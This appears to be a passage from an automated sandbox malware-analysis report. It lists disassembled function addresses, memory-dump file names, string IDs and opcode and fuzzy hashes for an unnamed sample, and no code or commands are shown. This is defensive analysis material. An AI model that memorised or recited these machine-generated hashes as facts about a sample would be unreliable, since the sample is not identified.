                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3;$g
                                        • API String ID: 0-3386546047
                                        • Opcode ID: a72af3125bb3e443bece511a9bcd19e5913575f3ee11a26e9820a4beed985064
                                        • Instruction ID: 6dcd03671a0a85eb4321abc6ea476657b06a9dc828d2623020556a130967d03a
                                        • Opcode Fuzzy Hash: a72af3125bb3e443bece511a9bcd19e5913575f3ee11a26e9820a4beed985064
                                        • Instruction Fuzzy Hash: F4712DF390C6048BE300BE6DEC8536ABBD5EBD4360F1A863DDAC8C7344E97948558786
                                        Function 004DB5A7 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: hIsz
                                        • API String ID: 0-341771432
                                        • Opcode ID: 49bdae8f5e25b3d8d297e750d8e9e45ae309721ca878205308ee83a86506fb37
                                        • Instruction ID: 4ae1ca918e9ea0d28b8fa485d53d2e2e51c998452371adc481580fb8be97b9a5
                                        • Opcode Fuzzy Hash: 49bdae8f5e25b3d8d297e750d8e9e45ae309721ca878205308ee83a86506fb37
                                        • Instruction Fuzzy Hash: 37510AB36183145FF3086D3CDC957B6B7D9DB84720F1A493EEAC5D7784E93958004686
                                        Function 00480990 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: QvKF
                                        • API String ID: 0-2394673490
                                        • Opcode ID: fa8f18ab107bc81f47f28cc1c1be182337819a77b99bd50b2dce41a4c4f6f8ac
                                        • Instruction ID: 4afadfed54e88437b66e2b86f06fa1309a2903b63a0f9ebe4b440d7a73f40ed9
                                        • Opcode Fuzzy Hash: fa8f18ab107bc81f47f28cc1c1be182337819a77b99bd50b2dce41a4c4f6f8ac
                                        • Instruction Fuzzy Hash: 04512CF3A082085BE7147E3AED4877BBBDADBD5760F1B813DD68087788F93598058285
                                        Function 001AE544 Relevance: .8, Instructions: 823COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: 9975fb23b5b1939449f9ebb362232cc29595fb5f96c3964b5f49a7c71ff83dd1
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: 1F82D1B5A00F448FD765CF29C880B92B7F1BF5A300F548A2ED9EA9B651DB30B545CB90
                                        Function 001C8E78 Relevance: .6, Instructions: 649COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 96bb34b778b67ef686e0cba5ff666694630d66cbac964356d5b1688936c8e66f
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 6842C1706047518FC729CF19C098B75FBE2BFA9310F298AAED4868B791D735E885CB50
                                        Function 001FAC28 Relevance: .5, Instructions: 501COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: d9cff39bfd90527e9697580924213ca7cad5b6ad30e0b9d2f40fc5b7e1a2a662
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: 680206B1E0431A8FCB15CF68C8906BFB7E2AF9A344F56831AE919B7241D774AD4187D0
                                        Function 001D98B8 Relevance: .5, Instructions: 482COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 36758208736f437ec41dbe54f43d24a5b36d74f6c12d3904f2f96ea7c3aea85e
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: FD02F071A087058FDB19DF29C880369B7E2AFA5350F15C72EE8999B392D731E885CB41
                                        Function 001C66C8 Relevance: .4, Instructions: 418COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: 22f0d6f413f9527d74016ec84b429158b5d522ef79ae030816a913c5ff6c4b49
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: 7FF17AA220C6914BC71D9A1484F09BD7FD25FAA201F0E86ADFDD70F393DA24DA01DB61
                                        Function 0020B308 Relevance: .4, Instructions: 415COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: 79c725220b6974bdd1a2f78f2342fc3ee339dfe35f2d7b24e97064bc97f4c373
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 4ED1B773F20A254BEB18CE99DC913ADB6E2EBD8350F19413ED916F7381D6B89D018790
                                        Function 001F0B88 Relevance: .4, Instructions: 378COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction ID: 9e0861f5d3ddc3c2dd04b3867c8ba8fde3caeabd5a6c4602f1569163d3a6d579
                                        • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction Fuzzy Hash: 89D1E272E0061D8BDF29CF98C8947FEB7B2BF49310F158229EA15A7292D73459468B90
                                        Function 001DB8A8 Relevance: .4, Instructions: 376COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 3a9d6a0feba878b17d0fe5540e834579458b08e829cbea8f0bfdf54f2346c5d0
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 2D027974E046588FCF26CFA8C4905EDBBB6FF8D310F55815AE88A6B355C730AA91CB50
                                        Function 001DBD68 Relevance: .4, Instructions: 372COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: ae12cb252971a5bc3f127653a8ee50de2f6e9edf9b86850cfc5c564c4c7aedc6
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: 27021475E00619CFCF15CF98C4809ADB7B6FF88350F25856AE80AAB355D731AA91CF90
                                        Function 001FA648 Relevance: .3, Instructions: 339COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
